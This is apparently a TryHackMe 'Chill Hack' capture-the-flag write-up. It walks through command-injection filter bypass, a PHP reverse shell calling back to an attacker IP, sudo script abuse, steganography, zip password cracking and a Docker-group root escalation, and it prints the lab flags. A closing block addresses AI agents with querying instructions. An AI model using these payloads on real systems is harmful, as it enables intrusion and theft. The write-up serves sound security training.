# Chill Hack {% embed url="" %} ## ## Task 1 Investigate! ### User Flag * Let's run a simple `nmap` scan against the target machine. ``` $ nmap -sC -sV 10.10.159.234 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-14 13:23 IST Nmap scan report for 10.10.159.234 Host is up (0.13s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.17.48.138 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA) | 256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA) |_ 256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Game Info |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.15 seconds ``` * There are three open ports: | Port | Service | | ---- | ------- | | 21 | ftp | | 22 | ssh | | 80 | http | * We can connect anonymously through FTP. ``` $ ftp anonymous@10.10.159.234 Connected to 10.10.159.234. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` * There is a `note.txt` file that we can download on our machine using the `get` command. ``` ftp> get note.txt local: note.txt remote: note.txt 229 Entering Extended Passive Mode (|||62537|) 150 Opening BINARY mode data connection for note.txt (90 bytes). 100% |***********************************************************************************************************************************************************************************************| 90 348.77 KiB/s 00:00 ETA 226 Transfer complete. 90 bytes received in 00:00 (0.68 KiB/s) ``` * Let's `cat` out the `note.txt` file. ``` $ cat note.txt Anurodh told me that there is some filtering on strings being put in the command -- Apaar ``` * So there is some page where we can input commands which are then filtered. * Let's try to find out the page where this is happening using `gobuster`. ``` $ gobuster dir -u http://10.10.159.234 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.159.234 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /css (Status: 301) [Size: 312] [--> http://10.10.159.234/css/] /fonts (Status: 301) [Size: 314] [--> http://10.10.159.234/fonts/] /images (Status: 301) [Size: 315] [--> http://10.10.159.234/images/] /index.html (Status: 200) [Size: 35184] /js (Status: 301) [Size: 311] [--> http://10.10.159.234/js/] /secret (Status: 301) [Size: 315] [--> http://10.10.159.234/secret/] /server-status (Status: 403) [Size: 278] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` * The `/secret` page looks interesting, let's visit it through our browser.
* As we can see this is the page where we can input commands. * Let's pass the following command: ``` id ```
* Looks like it worked. * Let's list out the content of the directory: ``` ls -la ```
* Ah so our command probably matched some black-list string and was filtered. * We can try to bypass the filter using single quotes: ``` l's' -la ```
* There is an `index.php` file. If we can manage to read it, we might be able to see how the black-list is implemented. * Let's `cat` it out. ``` cat index.php ```
* We can do the same bypass as before with single quotes: ``` c'a't index.php ```
* The layout looks different. That is because the `ìndex.php` file was read and executed. * We can now check the source code using `CTRL+U`.
* Now we know what pattern are being filterd. ```php $blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls'); ``` * Let's set up a `nc` listener. ``` $ nc -nlvp 9999 Listening on [any] 9999... ``` * Now we have to provide a PHP reverse shell: ``` p'h'p -r '$sock=fsockopen("10.17.48.138",9999);exec("/bin/sh -i <&3 >&3 2>&3");' ```
* Let's check back on our listener. ``` $ nc -nlvp 9999 listening on [any] 9999 ... connect to [10.17.48.138] from (UNKNOWN) [10.10.159.234] 39848 /bin/sh: 0: can't access tty; job control turned off $ ``` * We can get a stable shell using the following command: ``` $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@ubuntu:/var/www/html/secret$ ``` * Let's chat files the `www-data` user can run using `sudo`. ``` www-data@ubuntu:/home$ sudo -l sudo -l Matching Defaults entries for www-data on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh ``` * Let's take a better look at what the `.helpline.sh` file does. ``` www-data@ubuntu:/home$ cat /home/apaar/.helpline.sh cat /home/apaar/.helpline.sh #!/bin/bash echo echo "Welcome to helpdesk. Feel free to talk to anyone at any time!" echo read -p "Enter the person whom you want to talk with: " person read -p "Hello user! I am $person, Please enter your message: " msg $msg 2>/dev/null echo "Thank you for your precious time!" ``` * So it uses the `/bin/bash` interpreter for all of the user input. Which means we we should be able to get a shell. ``` www-data@ubuntu:/var/www/files/images$ sudo -u apaar /home/apaar/.helpline.sh sudo -u apaar /home/apaar/.helpline.sh Welcome to helpdesk. Feel free to talk to anyone at any time! Enter the person whom you want to talk with: knign knign Hello user! I am knign, Please enter your message: /bin/bash /bin/bash id id uid=1001(apaar) gid=1001(apaar) groups=1001(apaar) python3 -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' apaar@ubuntu:/var/www/files/images$ ``` * Let's get the flag from `/user.txt`. ``` apaar@ubuntu:~$ cat /home/apaar/local.txt cat /home/apaar/local.txt {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww} ``` ### Answer ``` {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww} ``` ### ### Root Flag * Let's list out the contents of the directory. ``` apaar@ubuntu:/var/www/files/images$ ls -la ls -la total 2112 drwxr-xr-x 2 root root 4096 Oct 3 2020 . drwxr-xr-x 3 root root 4096 Oct 3 2020 .. -rw-r--r-- 1 root root 2083694 Oct 3 2020 002d7e638fb463fb7a266f5ffc7ac47d.gif -rw-r--r-- 1 root root 68841 Oct 3 2020 hacker-with-laptop_23-2147985341.jpg ``` * We can see that there is a JPG image. * Let's set up a Python3 server so that we can get this file from our attacker machine. ``` apaar@ubuntu:/var/www/files/images$ python3 -m http.server python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` * On our attacker machine we have to use `wget` to download the JPG file. ``` $ wget http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg --2023-12-14 15:15:45-- http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg Connecting to 10.10.159.234:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 68841 (67K) [image/jpeg] Saving to: ‘hacker-with-laptop_23-2147985341.jpg’ hacker-with-laptop_23-2147985341.jpg 100%[========================================================================================================================================>] 67.23K 182KB/s in 0.4s 2023-12-14 15:15:46 (182 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841] ``` * Using `steghide` we can check if there is any embedded file or message and extract it. ``` $ steghide extract -sf hacker-with-laptop_23-2147985341.jpg Enter passphrase: wrote extracted data to "backup.zip". ``` * Let's `unzip` the ZIP file. ``` $ unzip backup.zip Archive: backup.zip [backup.zip] source_code.php password: ``` * In order to unzip it we need a password. * We can use `zip2john` to convert the ZIP file into a hash. ``` $ zip2john backup.zip > backup_hash ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8 ``` * Now, using `john` we can crack the hash. ``` $ john --wordlist=/usr/share/wordlists/rockyou.txt backup_hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 3 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status pass1word (backup.zip/source_code.php) 1g 0:00:00:00 DONE (2023-12-14 15:18) 4.166g/s 51200p/s 51200c/s 51200C/s horoscope..hawkeye Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` * Let's unzip the file using the `pass1word` password. ``` $ unzip backup.zip Archive: backup.zip [backup.zip] source_code.php password: inflating: source_code.php ``` {% code title="source\_code.php" %} ```php


Enter the OTP:
``` {% endcode %} * In the `source_code.php` file we can see a message for a user `Anurodh` and a Base64 encoded password. * Let's decode the password using `base64`. ``` $ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d !d0ntKn0wmYp@ssw0rd ``` * We can now login through SSH as the user `anurodh` using the `!d0ntKn0wmYp@ssw0rd` password. ``` $ ssh anurodh@10.10.159.234 The authenticity of host '10.10.159.234 (10.10.159.234)' can't be established. ED25519 key fingerprint is SHA256:mDI9eoI+sD1gmuE1Vl2iLvyVIopHnZlbAEFxr82BFwc. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.159.234' (ED25519) to the list of known hosts. anurodh@10.10.159.234's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Dec 14 09:53:01 UTC 2023 System load: 0.08 Processes: 134 Usage of /: 24.8% of 18.57GB Users logged in: 0 Memory usage: 22% IP address for eth0: 10.10.159.234 Swap usage: 0% IP address for docker0: 172.17.0.1 * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 19 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. anurodh@ubuntu:~$ ``` * Using the `id` command we can check the groups that the `anurodh` user is part of. ``` anurodh@ubuntu:~$ id uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker) ``` * So the `anurodh` user is part of the `docker` group. * We can find an exploit for Docker on GTFOBins.
``` docker run -v /:/mnt --rm -it alpine chroot /mnt sh ``` * Let's use the exploit without the `sudo`. ``` anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo) ``` * We are now the `root` user and can read the root flag. ``` # cat /root/proof.txt {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}} ``` ### Answer ``` {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/chill-hack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.